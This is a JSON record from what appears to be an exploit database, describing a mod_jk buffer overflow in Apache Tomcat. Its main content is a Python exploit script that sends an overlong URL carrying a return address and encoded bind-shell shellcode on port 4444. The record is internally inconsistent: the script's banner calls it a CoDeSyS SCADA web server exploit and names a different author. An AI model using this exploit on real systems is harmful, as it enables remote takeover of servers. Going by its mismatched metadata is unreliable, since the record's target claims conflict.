DATABASE RESOURCES PRICING ABOUT US

{"lastseen": "2020-04-01T19:04:03", "references": [], "description": "\nStack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache\nTomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute\narbitrary code via a long URL that triggers the overflow in a URI worker map routine.\n", "edition": 1, "reporter": "Unhope - unhope@chroot.org", "exploitpack": {"type": "remote", "platform": "windows"}, "published": "2010-08-12T00:00:00", "title": "Apache-Mod-JK", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.7, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.7}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2010-08-12T00:00:00", "id": "EXPLOITPACK:4C11A345A88E3644E98C1DDC3F8BED53", "href": "", "viewCount": 4, "sourceData": "import string, sys\nimport socket, httplib\nimport telnetlib\n\nTarget = sys.argv[1]\nPort = int(sys.argv[2])\nShellcodeType = sys.argv[3]\n\ndef howtousage():\n print \"Sorry, required arguments: Host Port\"\n sys.exit(-1)\n\ndef run():\n try:\n\n eip = \"\\x67\\x42\\xa7\\x71\"\n junk = \"\\x42\" * 775\n remoteshell = (\n \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\"\n \"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\"\n \"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\"\n \"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\"\n \"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4c\\x56\\x4b\\x4e\"\n \"\\x4d\\x54\\x4a\\x4e\\x49\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x42\\x36\\x4b\\x48\"\n \"\\x4e\\x36\\x46\\x52\\x46\\x42\\x4b\\x58\\x45\\x54\\x4e\\x43\\x4b\\x38\\x4e\\x37\"\n \"\\x45\\x50\\x4a\\x47\\x41\\x30\\x4f\\x4e\\x4b\\x38\\x4f\\x54\\x4a\\x31\\x4b\\x58\"\n \"\\x4f\\x55\\x42\\x52\\x41\\x50\\x4b\\x4e\\x49\\x54\\x4b\\x48\\x46\\x33\\x4b\\x58\"\n \"\\x41\\x50\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x59\\x4e\\x4a\\x46\\x38\\x42\\x4c\"\n \"\\x46\\x57\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x30\\x44\\x4c\\x4b\\x4e\"\n \"\\x46\\x4f\\x4b\\x33\\x46\\x55\\x46\\x42\\x4a\\x32\\x45\\x47\\x45\\x4e\\x4b\\x58\"\n \"\\x4f\\x55\\x46\\x42\\x41\\x30\\x4b\\x4e\\x48\\x36\\x4b\\x48\\x4e\\x50\\x4b\\x34\"\n \"\\x4b\\x48\\x4f\\x45\\x4e\\x31\\x41\\x50\\x4b\\x4e\\x43\\x30\\x4e\\x52\\x4b\\x38\"\n \"\\x49\\x58\\x4e\\x36\\x46\\x42\\x4e\\x41\\x41\\x36\\x43\\x4c\\x41\\x43\\x4b\\x4d\"\n \"\\x46\\x56\\x4b\\x48\\x43\\x44\\x42\\x53\\x4b\\x58\\x42\\x44\\x4e\\x30\\x4b\\x48\"\n \"\\x42\\x47\\x4e\\x41\\x4d\\x4a\\x4b\\x48\\x42\\x34\\x4a\\x30\\x50\\x35\\x4a\\x56\"\n \"\\x50\\x48\\x50\\x54\\x50\\x50\\x4e\\x4e\\x42\\x35\\x4f\\x4f\\x48\\x4d\\x48\\x46\"\n \"\\x43\\x55\\x48\\x56\\x4a\\x46\\x43\\x53\\x44\\x33\\x4a\\x36\\x47\\x37\\x43\\x57\"\n \"\\x44\\x33\\x4f\\x35\\x46\\x55\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x4b\\x4c\\x4d\\x4e\"\n \"\\x4e\\x4f\\x4b\\x53\\x42\\x55\\x4f\\x4f\\x48\\x4d\\x4f\\x55\\x49\\x58\\x45\\x4e\"\n \"\\x48\\x46\\x41\\x58\\x4d\\x4e\\x4a\\x50\\x44\\x30\\x45\\x35\\x4c\\x46\\x44\\x50\"\n \"\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x49\\x4d\\x49\\x30\\x45\\x4f\\x4d\\x4a\\x47\\x55\"\n \"\\x4f\\x4f\\x48\\x4d\\x43\\x45\\x43\\x35\\x43\\x45\\x43\\x55\\x43\\x45\\x43\\x34\"\n \"\\x43\\x45\\x43\\x44\\x43\\x35\\x4f\\x4f\\x42\\x4d\\x48\\x56\\x4a\\x36\\x41\\x31\"\n \"\\x4e\\x35\\x48\\x46\\x43\\x45\\x49\\x48\\x41\\x4e\\x45\\x59\\x4a\\x46\\x46\\x4a\"\n \"\\x4c\\x41\\x42\\x37\\x47\\x4c\\x47\\x55\\x4f\\x4f\\x48\\x4d\\x4c\\x36\\x42\\x41\"\n \"\\x41\\x45\\x45\\x35\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x46\\x4a\\x4d\\x4a\\x50\\x52\"\n \"\\x49\\x4e\\x47\\x45\\x4f\\x4f\\x48\\x4d\\x43\\x55\\x45\\x35\\x4f\\x4f\\x42\\x4d\"\n \"\\x4a\\x56\\x45\\x4e\\x49\\x44\\x48\\x38\\x49\\x54\\x47\\x55\\x4f\\x4f\\x48\\x4d\"\n \"\\x42\\x55\\x46\\x45\\x46\\x45\\x45\\x45\\x4f\\x4f\\x42\\x4d\\x43\\x49\\x4a\\x46\"\n \"\\x47\\x4e\\x49\\x57\\x48\\x4c\\x49\\x57\\x47\\x55\\x4f\\x4f\\x48\\x4d\\x45\\x55\"\n \"\\x4f\\x4f\\x42\\x4d\\x48\\x56\\x4c\\x46\\x46\\x36\\x48\\x36\\x4a\\x56\\x43\\x36\"\n \"\\x4d\\x46\\x49\\x58\\x45\\x4e\\x4c\\x56\\x42\\x45\\x49\\x45\\x49\\x32\\x4e\\x4c\"\n \"\\x49\\x48\\x47\\x4e\\x4c\\x56\\x46\\x34\\x49\\x48\\x44\\x4e\\x41\\x33\\x42\\x4c\"\n \"\\x43\\x4f\\x4c\\x4a\\x50\\x4f\\x44\\x54\\x4d\\x32\\x50\\x4f\\x44\\x54\\x4e\\x52\"\n \"\\x43\\x39\\x4d\\x58\\x4c\\x57\\x4a\\x43\\x4b\\x4a\\x4b\\x4a\\x4b\\x4a\\x4a\\x46\"\n \"\\x44\\x37\\x50\\x4f\\x43\\x4b\\x48\\x41\\x4f\\x4f\\x45\\x47\\x46\\x34\\x4f\\x4f\"\n \"\\x48\\x4d\\x4b\\x35\\x47\\x45\\x44\\x35\\x41\\x35\\x41\\x35\\x41\\x45\\x4c\\x56\"\n \"\\x41\\x30\\x41\\x35\\x41\\x35\\x45\\x55\\x41\\x45\\x4f\\x4f\\x42\\x4d\\x4a\\x56\"\n \"\\x4d\\x4a\\x49\\x4d\\x45\\x50\\x50\\x4c\\x43\\x45\\x4f\\x4f\\x48\\x4d\\x4c\\x46\"\n \"\\x4f\\x4f\\x4f\\x4f\\x47\\x53\\x4f\\x4f\\x42\\x4d\\x4b\\x48\\x47\\x55\\x4e\\x4f\"\n \"\\x43\\x58\\x46\\x4c\\x46\\x46\\x4f\\x4f\\x48\\x4d\\x44\\x45\\x4f\\x4f\\x42\\x4d\"\n \"\\x4a\\x56\\x4f\\x4e\\x50\\x4c\\x42\\x4e\\x42\\x56\\x43\\x45\\x4f\\x4f\\x48\\x4d\"\n \"\\x4f\\x4f\\x42\\x4d\\x5a\") # Binds a shell at port 4444\n\n if ShellcodeType == \"R\":\n Shellcode=remoteshell\n vulnerableURL = '/' + junk + eip + Shellcode\n Connection = httplib.HTTPConnection(Host, Port)\n Connection.request('GET', vulnerableURL)\n Connection.close()\n\n except:\n print \"Exploit connection closed\"\n\nif __name__ == '__main__':\n print \"CoDeSyS Scada WebServer Buffer Overflow Exploit\"\n print \"Author: Celil UNUVER\"\n\n try:\n Host = sys.argv[1]\n Port = sys.argv[2]\n except IndexError:\n howtousage()\nrun()\n", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645742866, "score": 1659818015}, "_internal": {"score_hash": "f575b2865850cdbb3055ce8f6d985c4f"}}

{}